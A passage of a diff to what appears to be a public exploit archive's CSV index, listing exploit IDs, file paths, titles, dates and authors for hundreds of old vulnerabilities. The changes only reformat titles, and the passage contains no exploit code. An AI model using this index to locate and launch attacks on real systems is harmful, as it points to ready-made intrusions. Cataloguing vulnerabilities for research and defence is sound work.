22201,platforms/multiple/remote/22201.txt,"List Site Pro 2.0 - User Database Delimiter Injection",2003-01-24,Statix,multiple,remote,0 -22202,platforms/php/webapps/22202.txt,"FTLS GuestBook 1.1 Script Injection",2003-01-25,BrainRawt,php,webapps,0 -22203,platforms/solaris/local/22203.txt,"Sun Solaris 2.5/2.6/7.0/8/9 AT Command Arbitrary File Deletion",2003-01-27,"Wojciech Purczynski",solaris,local,0 +22202,platforms/php/webapps/22202.txt,"FTLS GuestBook 1.1 - Script Injection",2003-01-25,BrainRawt,php,webapps,0 +22203,platforms/solaris/local/22203.txt,"Sun Solaris 2.5/2.6/7.0/8/9 AT Command - Arbitrary File Deletion",2003-01-27,"Wojciech Purczynski",solaris,local,0 22204,platforms/cgi/webapps/22204.txt,"MultiHTML 1.5 - File Disclosure",2000-09-13,"Niels Heinen",cgi,webapps,0 22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x - Null Byte Directory/File Disclosure",2003-01-26,"Jouko Pynnönen",linux,remote,0 22206,platforms/php/webapps/22206.txt,"Nukebrowser 2.x - Remote File Inclusion",2003-01-30,Havenard,php,webapps,0 @@ -19482,9 +19482,9 @@ id,file,description,date,author,platform,type,port 22223,platforms/multiple/dos/22223.txt,"Epic Games Unreal Engine 436 Client Unreal URL Denial of Service",2003-02-05,"Auriemma Luigi",multiple,dos,0 22224,platforms/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 URL Directory Traversal",2003-02-05,"Auriemma Luigi",multiple,remote,0 22225,platforms/windows/local/22225.txt,"Microsoft Windows XP - Redirector Privilege Escalation",2003-02-05,Nsfocus,windows,local,0 -22226,platforms/windows/remote/22226.txt,"Microsoft Internet Explorer 5 ShowHelp Arbitrary Command Execution",2003-02-05,"Andreas Sandblad",windows,remote,0 -22227,platforms/cgi/webapps/22227.txt,"FileSeek CGI Script Remote Command Execution",2002-04-16,"Thijs Bosschert",cgi,webapps,0 -22228,platforms/cgi/webapps/22228.txt,"FileSeek CGI Script File Disclosure",2002-04-16,"Thijs Bosschert",cgi,webapps,0 +22226,platforms/windows/remote/22226.txt,"Microsoft Internet Explorer 5 ShowHelp - Arbitrary Command Execution",2003-02-05,"Andreas Sandblad",windows,remote,0 +22227,platforms/cgi/webapps/22227.txt,"FileSeek CGI Script - Remote Command Execution",2002-04-16,"Thijs Bosschert",cgi,webapps,0 +22228,platforms/cgi/webapps/22228.txt,"FileSeek - CGI Script File Disclosure",2002-04-16,"Thijs Bosschert",cgi,webapps,0 22229,platforms/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",windows,remote,0 22230,platforms/multiple/dos/22230.pl,"Netscape Enterprise Server 4.1 HTTP Method Name Buffer Overflow",2001-05-19,"Robert Cardona",multiple,dos,0 22231,platforms/hp-ux/local/22231.txt,"HPUX 10.20/11 Wall Message Buffer Overflow",2003-02-07,Scotty,hp-ux,local,0 @@ -19496,10 +19496,10 @@ id,file,description,date,author,platform,type,port 22237,platforms/windows/dos/22237.txt,"Microsoft Office Picture Manager 2010 - Crash PoC",2012-10-25,coolkaveh,windows,dos,0 22239,platforms/windows/dos/22239.txt,"Opera 6.0/7.0 - Username URI Warning Dialog Buffer Overflow",2003-02-10,nesumin,windows,dos,0 22240,platforms/windows/dos/22240.txt,"Opera 6.0/7.0 opera.PluginContext Native Method Denial of Service",2003-01-13,"Marc Schoenefeld",windows,dos,0 -22241,platforms/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 -22242,platforms/php/webapps/22242.txt,"Cedric Email Reader 0.4 Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 +22241,platforms/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 - Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 +22242,platforms/php/webapps/22242.txt,"Cedric Email Reader 0.4 - Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 22243,platforms/linux/dos/22243.txt,"RARLAB FAR 1.65/1.70 - File Manager Buffer Overflow",2003-02-11,3APA3A,linux,dos,0 -22244,platforms/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",hardware,remote,0 +22244,platforms/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",hardware,remote,0 22245,platforms/windows/dos/22245.txt,"Microsoft Windows NT/2000 cmd.exe CD Buffer Overflow",2003-02-11,3APA3A,windows,dos,0 22246,platforms/hp-ux/local/22246.c,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)",2003-02-12,"Last Stage of Delirium",hp-ux,local,0 22247,platforms/hp-ux/local/22247.sh,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (2)",2003-02-20,watercloud,hp-ux,local,0 @@ -19510,7 +19510,7 @@ id,file,description,date,author,platform,type,port 22252,platforms/php/webapps/22252.txt,"PHP-Board 1.0 - User Password Disclosure",2003-02-15,frog,php,webapps,0 22253,platforms/php/webapps/22253.txt,"DotBr 0.1 - System.php3 Remote Command Execution",2003-02-15,frog,php,webapps,0 22254,platforms/php/webapps/22254.txt,"DotBr 0.1 - Exec.php3 Remote Command Execution",2003-02-15,frog,php,webapps,0 -22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0 +22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4 - Riched20.dll Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0 22256,platforms/php/webapps/22256.txt,"D-Forum 1 header Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 22257,platforms/php/webapps/22257.txt,"D-Forum 1 footer Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 22258,platforms/windows/dos/22258.txt,"Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 - Multiple Vulnerabilities",2012-10-26,shinnai,windows,dos,0 @@ -19558,7 +19558,7 @@ id,file,description,date,author,platform,type,port 22302,platforms/windows/dos/22302.rb,"hMailServer 5.3.3 IMAP Remote Crash PoC",2012-10-28,"John Smith",windows,dos,0 22303,platforms/windows/dos/22303.pl,"Microsoft Windows Help program - (WinHlp32.exe) Crash PoC",2012-10-28,coolkaveh,windows,dos,0 22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection",2012-10-28,Metasploit,multiple,remote,0 -22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow",2012-10-29,Metasploit,windows,remote,0 +22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode - coda.exe 0x8c Buffer Overflow",2012-10-29,Metasploit,windows,remote,0 22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow",2012-10-29,Metasploit,windows,remote,0 22330,platforms/windows/dos/22330.txt,"Microsoft Office Excel 2010 - Crash PoC",2012-10-29,coolkaveh,windows,dos,0 22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72_lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0 @@ -19587,7 +19587,7 @@ id,file,description,date,author,platform,type,port 22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 - HTML Source Password Retrieval",2003-03-03,THR,windows,local,0 22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0 22336,platforms/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution",2003-03-06,"gregory Le Bras",php,webapps,0 -22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 Logbook.pl Remote Command Execution",2003-03-07,"Aleksey Sintsov",cgi,webapps,0 +22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 - Logbook.pl Remote Command Execution",2003-03-07,"Aleksey Sintsov",cgi,webapps,0 22338,platforms/windows/remote/22338.txt,"Clearswift MailSweeper 4.x - Malformed MIME Attachment Filter Bypass",2003-03-07,http-equiv,windows,remote,0 22339,platforms/php/webapps/22339.txt,"SimpleBBS 1.0.6 - Users.php Insecure File Permissions",2003-03-07,flur,php,webapps,0 22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - mysqld Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0 @@ -19604,7 +19604,7 @@ id,file,description,date,author,platform,type,port 22351,platforms/windows/remote/22351.py,"Freefloat FTP Server PUT Command Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0 22352,platforms/linux/dos/22352.txt,"TCPDump 3.6/3.7 - Malformed RADIUS Packet Denial of Service",2003-03-14,"Bill Ralph",linux,dos,0 22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote Send_CTCP() Memory Corruption",2003-03-06,eSDee,linux,remote,0 -22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0 +22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 - Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0 22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0 22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0 22357,platforms/asp/webapps/22357.txt,"RSA ClearTrust 4.6/4.7 Login Page Cross-Site Scripting",2003-03-15,sir.mordred@hushmail.com,asp,webapps,0 @@ -19625,7 +19625,7 @@ id,file,description,date,author,platform,type,port 22372,platforms/php/webapps/22372.txt,"vam shop 1.69 - Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 22373,platforms/php/webapps/22373.txt,"PG Dating Pro 1.0 CMS - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0 22374,platforms/php/webapps/22374.txt,"WordPress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps,0 -22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",2012-11-01,Metasploit,windows,remote,0 +22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd - ChooseFilePath Buffer Overflow",2012-11-01,Metasploit,windows,remote,0 22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 - Format String",2003-03-28,"Core Security",linux,local,0 22377,platforms/cgi/webapps/22377.txt,"Kebi Academy 2001 Input Validation",2003-03-17,"dong-h0un U",cgi,webapps,0 22378,platforms/php/webapps/22378.txt,"MyAbraCadaWeb 1.0 - Path Disclosure",2003-03-17,"gregory Le Bras",php,webapps,0 @@ -19647,7 +19647,7 @@ id,file,description,date,author,platform,type,port 22394,platforms/hardware/remote/22394.txt,"Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence",2003-03-21,"Dr. Peter Bieringer",hardware,remote,0 22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption",2003-03-21,"Auriemma Luigi",windows,dos,0 22396,platforms/php/webapps/22396.txt,"WordPress bbpress Plugin - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 -22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 +22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus - Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 22398,platforms/php/webapps/22398.php,"Invision Power Board 3.3.4 - 'unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent XSS",2012-11-01,"CYBSEC Labs",php,webapps,0 22401,platforms/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash PoC",2012-11-01,"Jean Pascal Pereira",windows,dos,0 @@ -19699,10 +19699,10 @@ id,file,description,date,author,platform,type,port 22448,platforms/windows/remote/22448.txt,"BEA WebLogic 7.0 Hostname/NetBIOS Name Remote Information Disclosure",2003-04-02,"Michael Hendrickx",windows,remote,0 22449,platforms/unix/remote/22449.c,"Passlog Daemon 0.1 SL_Parse Remote Buffer Overflow (1)",2003-04-02,Xpl017Elz,unix,remote,0 22450,platforms/unix/remote/22450.c,"Passlog Daemon 0.1 SL_Parse Remote Buffer Overflow (2)",2003-04-02,Xpl017Elz,unix,remote,0 -22451,platforms/php/webapps/22451.txt,"Phorum 3.4 Email Subject Line Script Injection",2003-04-02,peter,php,webapps,0 +22451,platforms/php/webapps/22451.txt,"Phorum 3.4 - Email Subject Line Script Injection",2003-04-02,peter,php,webapps,0 22452,platforms/linux/local/22452.sh,"ChiTeX 6.1.2 - Local Privilege Escalation",2003-04-03,zillion,linux,local,0 22453,platforms/hardware/remote/22453.txt,"Netgear FM114P ProSafe Wireless Router UPnP Information Disclosure",2003-04-03,stickler,hardware,remote,0 -22454,platforms/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",linux,remote,0 +22454,platforms/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",linux,remote,0 22455,platforms/hardware/remote/22455.txt,"Netgear FM114P ProSafe Wireless Router Rule Bypass",2003-04-03,stickler,hardware,remote,0 22456,platforms/linux/local/22456.txt,"AutomatedShops WebC 2.0/5.0 Symbolic Link Following Configuration File Weakness",2003-04-03,"Carl Livitt",linux,local,0 22457,platforms/php/webapps/22457.txt,"PHPSysInfo 2.0/2.1 - Index.php File Disclosure",2003-04-03,"Albert Puigsech Galicia",php,webapps,0 @@ -19747,8 +19747,8 @@ id,file,description,date,author,platform,type,port 22496,platforms/multiple/remote/22496.txt,"Python 2.2/2.3 Documentation Server Error Page Cross-Site Scripting",2003-04-15,euronymous,multiple,remote,0 22497,platforms/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Path Disclosure",2003-04-11,"Dennis Rand",multiple,remote,0 22498,platforms/php/webapps/22498.txt,"OSCommerce 2.2 - Authentication Bypass",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22499,platforms/cgi/webapps/22499.pl,"IkonBoard 3.1 Lang Cookie Arbitrary Command Execution (1)",2003-04-15,"Nick Cleaton",cgi,webapps,0 -22500,platforms/cgi/webapps/22500.pl,"IkonBoard 3.1 Lang Cookie Arbitrary Command Execution (2)",2003-05-05,snooq,cgi,webapps,0 +22499,platforms/cgi/webapps/22499.pl,"IkonBoard 3.1 Lang Cookie - Arbitrary Command Execution (1)",2003-04-15,"Nick Cleaton",cgi,webapps,0 +22500,platforms/cgi/webapps/22500.pl,"IkonBoard 3.1 Lang Cookie - Arbitrary Command Execution (2)",2003-05-05,snooq,cgi,webapps,0 22502,platforms/multiple/dos/22502.pl,"TW-WebServer 1.0 - Denial of Service (1)",2003-04-15,badpack3t,multiple,dos,0 22503,platforms/multiple/dos/22503.c,"TW-WebServer 1.0 - Denial of Service (2)",2003-04-16,"Shashank pandey",multiple,dos,0 22504,platforms/windows/remote/22504.txt,"Cerberus FTP Server 2.1 Information Disclosure Weakness",2003-04-16,"Ziv Kamir",windows,remote,0 @@ -19772,7 +19772,7 @@ id,file,description,date,author,platform,type,port 22571,platforms/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 Normal_HTML.CGI Command Execution",2003-05-07,"Revin Aldi",cgi,webapps,0 22524,platforms/php/webapps/22524.txt,"zenphoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,php,webapps,0 22525,platforms/windows/remote/22525.rb,"EMC Networker Format String",2012-11-07,Metasploit,windows,remote,0 -22526,platforms/windows/remote/22526.rb,"WinRM VBS Remote Code Execution",2012-11-07,Metasploit,windows,remote,0 +22526,platforms/windows/remote/22526.rb,"WinRM - VBS Remote Code Execution",2012-11-07,Metasploit,windows,remote,0 22527,platforms/linux/dos/22527.c,"Xeneo Web Server 2.2.10 Undisclosed Buffer Overflow",2003-04-23,badpack3t,linux,dos,0 22528,platforms/windows/local/22528.c,"Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow",2003-04-09,ThreaT,windows,local,0 22529,platforms/asp/webapps/22529.txt,"Battleaxe Software BTTLXE Forum Login.ASP SQL Injection",2003-04-23,Du|L,asp,webapps,0 @@ -19789,7 +19789,7 @@ id,file,description,date,author,platform,type,port 22540,platforms/linux/local/22540.c,"Linux-ATM LES 2.4 - Command Line Argument Buffer Overflow",2003-02-18,"Angelo Rosiello",linux,local,0 22541,platforms/cgi/remote/22541.txt,"Alt-N WebAdmin 2.0.x - Remote File Viewing",2003-04-25,david@kamborio.net,cgi,remote,0 22542,platforms/cgi/remote/22542.txt,"Alt-N WebAdmin 2.0.x - Remote File Disclosure",2003-04-25,david@kamborio.net,cgi,remote,0 -22543,platforms/php/webapps/22543.txt,"Onecenter Forum 4.0 IMG Tag Script Injection",2003-04-25,"David F. Madrid",php,webapps,0 +22543,platforms/php/webapps/22543.txt,"Onecenter Forum 4.0 - IMG Tag Script Injection",2003-04-25,"David F. Madrid",php,webapps,0 22544,platforms/cfm/webapps/22544.txt,"Macromedia ColdFusion MX 6.0 - Error Message Path Disclosure",2003-04-26,"Network Intelligence",cfm,webapps,0 22545,platforms/cgi/webapps/22545.pl,"Mike Bobbitt Album.PL 0.61 - Remote Command Execution",2003-04-26,aresu@bosen.net,cgi,webapps,0 22546,platforms/windows/remote/22546.txt,"Opera 7.0/7.10 JavaScript Console Single Quote Attribute Injection",2003-04-28,nesumin,windows,remote,0 @@ -19802,7 +19802,7 @@ id,file,description,date,author,platform,type,port 22553,platforms/windows/dos/22553.txt,"Microsoft BizTalk Server 2002 HTTP Receiver Buffer Overflow",2003-04-30,"Cesar Cerrudo",windows,dos,0 22554,platforms/asp/webapps/22554.txt,"Microsoft BizTalk Server 2000/2002 DTA rawdocdata.asp SQL Injection",2003-04-30,"Cesar Cerrudo",asp,webapps,0 22555,platforms/asp/webapps/22555.txt,"Microsoft BizTalk Server 2000/2002 DTA RawCustomSearchField.asp SQL Injection",2003-04-30,"Cesar Cerrudo",asp,webapps,0 -22556,platforms/windows/remote/22556.c,"MDG Web Server 4D 3.6 HTTP Command Buffer Overflow",2003-04-29,badpack3t,windows,remote,0 +22556,platforms/windows/remote/22556.c,"MDG Web Server 4D 3.6 - HTTP Command Buffer Overflow",2003-04-29,badpack3t,windows,remote,0 22557,platforms/php/webapps/22557.txt,"PHP-Nuke Splatt Forum 4.0 Module - Cross-Site Scripting",2003-05-01,"Morning Wood",php,webapps,0 22558,platforms/php/webapps/22558.txt,"PHP-Nuke Splatt Forum 4.0 Module - HTML Injection",2003-05-01,"Morning Wood",php,webapps,0 22559,platforms/cgi/webapps/22559.pl,"Stockman Shopping Cart 7.8 - Arbitrary Command Execution",2003-05-01,"Aleksey Sintsov",cgi,webapps,0 @@ -19929,7 +19929,7 @@ id,file,description,date,author,platform,type,port 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow",2012-11-13,Vulnerability-Lab,windows,dos,0 -22686,platforms/php/remote/22686.rb,"Invision IP.Board 3.3.4 unserialize() PHP Code Execution",2012-11-13,Metasploit,php,remote,0 +22686,platforms/php/remote/22686.rb,"Invision IP.Board 3.3.4 - unserialize() PHP Code Execution",2012-11-13,Metasploit,php,remote,0 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0 22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 nph-psa.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 @@ -19957,7 +19957,7 @@ id,file,description,date,author,platform,type,port 22710,platforms/php/webapps/22710.txt,"friendsinwar FAQ Manager - SQL Injection (Auth Bypass)",2012-11-14,d3b4g,php,webapps,0 22711,platforms/php/webapps/22711.txt,"Myrephp Business Directory - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22712,platforms/php/webapps/22712.txt,"MYREphp Vacation Rental Software - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 -22714,platforms/windows/remote/22714.rb,"Oracle Database Client System Analyzer Arbitrary File Upload",2012-11-15,Metasploit,windows,remote,0 +22714,platforms/windows/remote/22714.rb,"Oracle Database Client System Analyzer - Arbitrary File Upload",2012-11-15,Metasploit,windows,remote,0 22715,platforms/php/webapps/22715.txt,"WebChat 2.0 - Users.php Database Username Disclosure Weakness",2003-06-02,"Rynho Zeros Web",php,webapps,0 22716,platforms/php/webapps/22716.txt,"WebChat 2.0 - Users.php Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",php,webapps,0 22717,platforms/php/webapps/22717.txt,"SPChat 0.8 Module Remote File Inclusion",2003-06-02,"Rynho Zeros Web",php,webapps,0 @@ -19997,7 +19997,7 @@ id,file,description,date,author,platform,type,port 22752,platforms/java/webapps/22752.txt,"H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",java,webapps,0 22753,platforms/cgi/remote/22753.pl,"MNOGoSearch 3.1.20 - Search.CGI UL Buffer Overflow (1)",2003-06-10,pokleyzz,cgi,remote,0 22754,platforms/cgi/remote/22754.pl,"MNOGoSearch 3.1.20 - Search.CGI UL Buffer Overflow (2)",2003-06-10,inv,cgi,remote,0 -22755,platforms/multiple/remote/22755.txt,"Aiglon Web Server 2.0 Installation Path Information Disclosure Weakness",2003-06-10,"Ziv Kamir",multiple,remote,0 +22755,platforms/multiple/remote/22755.txt,"Aiglon Web Server 2.0 - Installation Path Information Disclosure Weakness",2003-06-10,"Ziv Kamir",multiple,remote,0 22756,platforms/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 LSMCODE Environment Variable Local Buffer Overflow",2003-06-01,watercloud,aix,local,0 22757,platforms/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3.5 - Multiple GET Requests Denial of Service",2003-06-11,posidron,windows,dos,0 22758,platforms/windows/remote/22758.txt,"silentthought simple Web server 1.0 - Directory Traversal",2003-06-12,"Ziv Kamir",windows,remote,0 @@ -20017,7 +20017,7 @@ id,file,description,date,author,platform,type,port 22774,platforms/windows/dos/22774.txt,"myServer 0.4.1 Signal Handling Denial of Service",2003-06-14,LynX,windows,dos,0 22775,platforms/linux/local/22775.txt,"FreeWnn 1.1.1 JServer Logging Option Data Corruption",2003-06-14,"Stefano Di Paola",linux,local,0 22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 Lib.Inc.php Remote File Inclusion Command Execution",2003-06-15,frog,php,webapps,0 -22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script Code Injection",2003-06-16,"gilbert vilvoorde",cgi,webapps,0 +22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script - Code Injection",2003-06-16,"gilbert vilvoorde",cgi,webapps,0 22778,platforms/asp/webapps/22778.txt,"Snitz Forums 2000 3.4.03 - Search.ASP Cross-Site Scripting",2003-06-16,JeiAr,asp,webapps,0 22779,platforms/windows/local/22779.pl,"Mailtraq 2.1.0.1302 - User Password Encoding Weakness",2003-06-16,"Noam Rathaus",windows,local,0 22780,platforms/windows/dos/22780.txt,"Mailtraq 2.1.0.1302 - Remote Format String SMTP Resource Consumption",2003-06-16,"Noam Rathaus",windows,dos,0 @@ -20027,11 +20027,11 @@ id,file,description,date,author,platform,type,port 22784,platforms/windows/remote/22784.txt,"Microsoft Internet Explorer 5 Custom HTTP Error HTML Injection",2003-06-17,"GreyMagic Software",windows,remote,0 22785,platforms/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",windows,remote,0 22786,platforms/linux/remote/22786.c,"Dune 0.6.7 HTTP Get Remote Buffer Overrun",2003-06-17,V9,linux,remote,0 -22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record File Upload RCE",2012-11-19,Metasploit,windows,remote,0 +22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - File Upload RCE",2012-11-19,Metasploit,windows,remote,0 22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g Remote Username Buffer Overrun",2003-03-30,dr_insane,windows,dos,0 22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0 22790,platforms/windows/dos/22790.txt,"GuildFTPD 0.999.8 CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 -22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 +22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 move_messages.php - Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 - Administrator Plugin options.php Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0 22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11",2003-06-17,dr_insane,php,webapps,0 22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server Long Get Request Remote Denial of Service",2003-06-17,dr_insane,windows,dos,0 @@ -20056,7 +20056,7 @@ id,file,description,date,author,platform,type,port 22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure",2003-06-20,IhaQueR,linux,local,0 22814,platforms/linux/dos/22814.txt,"GNU GNATS 3.0 02 PR-Edit Command Line Option Heap Corruption Vulnerablity",2003-06-21,"dong-h0un U",linux,dos,0 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,linux,local,0 -22816,platforms/windows/dos/22816.txt,"Symantec Security Check RuFSI ActiveX Control Buffer Overflow",2003-06-23,"Cesar Cerrudo",windows,dos,0 +22816,platforms/windows/dos/22816.txt,"Symantec Security Check RuFSI - ActiveX Control Buffer Overflow",2003-06-23,"Cesar Cerrudo",windows,dos,0 22817,platforms/windows/dos/22817.pl,"MyServer 0.4.1 - Remote Denial of Service",2003-06-23,eip,windows,dos,0 22818,platforms/php/webapps/22818.txt,"Tutos 1.1 - File_Select.php Cross-Site Scripting",2003-06-20,"François SORIN",php,webapps,0 22819,platforms/php/webapps/22819.txt,"Tutos 1.1 - File_New Arbitrary File Upload",2003-06-20,"François SORIN",php,webapps,0 @@ -20076,7 +20076,7 @@ id,file,description,date,author,platform,type,port 22834,platforms/windows/remote/22834.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (2)",2003-06-24,"Mark Litchfield",windows,remote,0 22835,platforms/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun",2003-06-24,posidron,windows,local,0 22836,platforms/linux/local/22836.pl,"Elm 2.3/2.4 - Local TERM Environment Variable Buffer Overrun",1997-05-13,kokanin,linux,local,0 -22837,platforms/windows/remote/22837.c,"Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0 +22837,platforms/windows/remote/22837.c,"Microsoft Windows 2000/NT 4 Media Services - NSIISlog.DLL Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0 22838,platforms/windows/remote/22838.txt,"BRS WebWeaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0 22839,platforms/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String",2003-06-27,Dinos,linux,dos,0 22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - suid execve() System Call Race Condition Executable File Read Proof of Concept",2003-06-26,IhaQueR,linux,local,0 @@ -20094,9 +20094,9 @@ id,file,description,date,author,platform,type,port 22852,platforms/multiple/webapps/22852.txt,"SonicWALL CDP 5040 6.x - Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,multiple,webapps,0 22853,platforms/php/webapps/22853.txt,"WordPress Facebook Survey 1.0 Plugin - SQL Injection",2012-11-20,"Vulnerability Research Laboratory",php,webapps,0 22854,platforms/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution",2012-11-20,Vulnerability-Lab,windows,remote,0 -22855,platforms/windows/dos/22855.txt,"Apple QuickTime 7.7.2 Targa image Buffer Overflow",2012-11-20,"Senator of Pirates",windows,dos,0 +22855,platforms/windows/dos/22855.txt,"Apple QuickTime 7.7.2 - Targa image Buffer Overflow",2012-11-20,"Senator of Pirates",windows,dos,0 22856,platforms/linux/remote/22856.rb,"Narcissus Image Configuration 